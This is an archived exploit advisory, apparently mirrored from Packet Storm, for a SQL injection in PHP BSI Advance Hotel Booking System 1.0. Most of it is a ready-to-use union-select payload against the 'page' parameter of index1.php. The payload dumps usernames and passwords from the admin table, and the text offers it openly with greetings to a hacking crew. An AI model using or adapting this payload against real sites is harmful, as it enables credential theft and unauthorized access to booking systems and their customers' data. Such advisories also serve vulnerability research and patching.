PHP BSI Advance Hotel Booking System 1.0 SQL Injection

🗓️ 15 Nov 2010 00:00:00Reported by v3n0mType

packetstorm🔗 packetstormsecurity.com👁 22 Views

PHP BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability, Exploit by v3n0

`-----------------------------------------------------------------------  
PHP BSI Advance Hotel Booking System v1.0 SQL Injection Vulnerability  
-----------------------------------------------------------------------  
Author : v3n0m  
Site : http://yogyacarderlink.web.id/  
Date : November, 14-2010  
Location : Jakarta, Indonesia  
Time Zone : GMT +7:00  
Application : PHP BSI Advance Hotel Booking System  
Version : 1.0  
Vendor : http://www.bestsoftinc.com/  
  
Exploit & p0c  
_____________  
  
-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--  
  
http://127.0.0.1/[path]/index1.php?page=[SQLi]  
http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--  
  
ShoutZ  
______  
  
All YOGYACARDERLINK CREW, GheMaX, LeQhi  
Also Jovita & Fabian :)  
  
`

15 Nov 2010 00:00Current

0.2Low risk

Vulners AI Score0.2